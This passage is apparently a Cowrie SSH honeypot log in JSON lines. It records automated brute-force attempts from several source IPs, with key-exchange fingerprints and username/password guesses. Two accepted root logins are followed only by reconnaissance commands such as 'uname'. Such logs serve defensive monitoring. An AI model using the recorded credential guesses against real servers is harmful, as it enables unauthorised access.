{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60974,"dst_ip":"1.2.3.4","dst_port":22,"session":"278a949506a9","protocol":"ssh","message":"New connection: 212.227.125.160:60974 (1.2.3.4:22) [session: 278a949506a9]","sensor":"my-vps","timestamp":"2025-08-26T21:54:05.283937Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:54:05.307119Z","src_ip":"212.227.125.160","session":"278a949506a9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:54:05.329719Z","src_ip":"212.227.125.160","session":"278a949506a9"}
{"eventid":"cowrie.login.failed","username":"hysteria","password":"hysteria","message":"login attempt [hysteria/hysteria] failed","sensor":"my-vps","timestamp":"2025-08-26T21:54:05.510301Z","src_ip":"212.227.125.160","session":"278a949506a9"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:54:06.616276Z","src_ip":"212.227.125.160","session":"278a949506a9"}
{"eventid":"cowrie.session.connect","src_ip":"213.108.243.7","src_port":49589,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f030ffebe2f","protocol":"ssh","message":"New connection: 213.108.243.7:49589 (1.2.3.4:22) [session: 5f030ffebe2f]","sensor":"my-vps","timestamp":"2025-08-26T21:54:08.148149Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:54:08.149363Z","src_ip":"213.108.243.7","session":"5f030ffebe2f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:54:08.250414Z","src_ip":"213.108.243.7","session":"5f030ffebe2f"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q2w#E4r","message":"login attempt [root/!Q2w#E4r] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:54:08.556679Z","src_ip":"213.108.243.7","session":"5f030ffebe2f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:54:08.832026Z","src_ip":"213.108.243.7","session":"5f030ffebe2f"}
{"eventid":"cowrie.command.input","input":"mount | head -5","message":"CMD: mount | head -5","sensor":"my-vps","timestamp":"2025-08-26T21:54:08.832810Z","src_ip":"213.108.243.7","session":"5f030ffebe2f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","size":28,"shasum":"eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:54:08.936399Z","src_ip":"213.108.243.7","session":"5f030ffebe2f"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:54:08.937624Z","src_ip":"213.108.243.7","session":"5f030ffebe2f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56362,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d5a02a6f20d","protocol":"ssh","message":"New connection: 212.227.125.160:56362 (1.2.3.4:22) [session: 1d5a02a6f20d]","sensor":"my-vps","timestamp":"2025-08-26T21:54:10.965610Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:54:10.966646Z","src_ip":"212.227.125.160","session":"1d5a02a6f20d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:54:11.016412Z","src_ip":"212.227.125.160","session":"1d5a02a6f20d"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"123456","message":"login attempt [hadoop/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T21:54:11.435779Z","src_ip":"212.227.125.160","session":"1d5a02a6f20d"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:54:12.489233Z","src_ip":"212.227.125.160","session":"1d5a02a6f20d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51746,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a563f3bdec8","protocol":"ssh","message":"New connection: 212.227.125.160:51746 (1.2.3.4:22) [session: 6a563f3bdec8]","sensor":"my-vps","timestamp":"2025-08-26T21:54:16.690246Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:54:16.691001Z","src_ip":"212.227.125.160","session":"6a563f3bdec8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:54:16.754462Z","src_ip":"212.227.125.160","session":"6a563f3bdec8"}
{"eventid":"cowrie.login.failed","username":"test2","password":"test2","message":"login attempt [test2/test2] failed","sensor":"my-vps","timestamp":"2025-08-26T21:54:17.413639Z","src_ip":"212.227.125.160","session":"6a563f3bdec8"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:54:18.475176Z","src_ip":"212.227.125.160","session":"6a563f3bdec8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47130,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6308cd6add6","protocol":"ssh","message":"New connection: 212.227.125.160:47130 (1.2.3.4:22) [session: c6308cd6add6]","sensor":"my-vps","timestamp":"2025-08-26T21:54:23.285738Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:54:23.286784Z","src_ip":"212.227.125.160","session":"c6308cd6add6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:54:23.350098Z","src_ip":"212.227.125.160","session":"c6308cd6add6"}
{"eventid":"cowrie.login.success","username":"root","password":"1qazXSW@","message":"login attempt [root/1qazXSW@] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:54:23.533319Z","src_ip":"212.227.125.160","session":"c6308cd6add6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:54:24.160764Z","src_ip":"212.227.125.160","session":"c6308cd6add6"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T21:54:24.161546Z","src_ip":"212.227.125.160","session":"c6308cd6add6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:54:24.275630Z","src_ip":"212.227.125.160","session":"c6308cd6add6"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:54:24.276852Z","src_ip":"212.227.125.160","session":"c6308cd6add6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42522,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a2aa98fb52e","protocol":"ssh","message":"New connection: 212.227.125.160:42522 (1.2.3.4:22) [session: 6a2aa98fb52e]","sensor":"my-vps","timestamp":"2025-08-26T21:54:29.486619Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:54:29.487617Z","src_ip":"212.227.125.160","session":"6a2aa98fb52e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:54:29.533779Z","src_ip":"212.227.125.160","session":"6a2aa98fb52e"}
{"eventid":"cowrie.login.failed","username":"cp_postgres","password":"cp_postgres","message":"login attempt [cp_postgres/cp_postgres] failed","sensor":"my-vps","timestamp":"2025-08-26T21:54:29.677396Z","src_ip":"212.227.125.160","session":"6a2aa98fb52e"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:54:30.832794Z","src_ip":"212.227.125.160","session":"6a2aa98fb52e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37912,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e3206923a88","protocol":"ssh","message":"New connection: 212.227.125.160:37912 (1.2.3.4:22) [session: 5e3206923a88]","sensor":"my-vps","timestamp":"2025-08-26T21:54:35.476278Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:54:35.486386Z","src_ip":"212.227.125.160","session":"5e3206923a88"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:54:35.526894Z","src_ip":"212.227.125.160","session":"5e3206923a88"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"testuser","message":"login attempt [testuser/testuser] failed","sensor":"my-vps","timestamp":"2025-08-26T21:54:36.040622Z","src_ip":"212.227.125.160","session":"5e3206923a88"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:54:37.374064Z","src_ip":"212.227.125.160","session":"5e3206923a88"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33300,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec83c45fda6d","protocol":"ssh","message":"New connection: 212.227.125.160:33300 (1.2.3.4:22) [session: ec83c45fda6d]","sensor":"my-vps","timestamp":"2025-08-26T21:54:41.450085Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:54:41.624400Z","src_ip":"212.227.125.160","session":"ec83c45fda6d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:54:41.625171Z","src_ip":"212.227.125.160","session":"ec83c45fda6d"}
{"eventid":"cowrie.login.failed","username":"admin123","password":"admin123","message":"login attempt [admin123/admin123] failed","sensor":"my-vps","timestamp":"2025-08-26T21:54:42.236619Z","src_ip":"212.227.125.160","session":"ec83c45fda6d"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:54:43.569631Z","src_ip":"212.227.125.160","session":"ec83c45fda6d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":6102,"dst_ip":"1.2.3.4","dst_port":22,"session":"e30cfa7736e7","protocol":"ssh","message":"New connection: 212.227.235.229:6102 (1.2.3.4:22) [session: e30cfa7736e7]","sensor":"my-vps","timestamp":"2025-08-26T21:54:46.242714Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-08-26T21:54:46.341651Z","src_ip":"212.227.235.229","session":"e30cfa7736e7"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-26T21:54:46.428333Z","src_ip":"212.227.235.229","session":"e30cfa7736e7"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-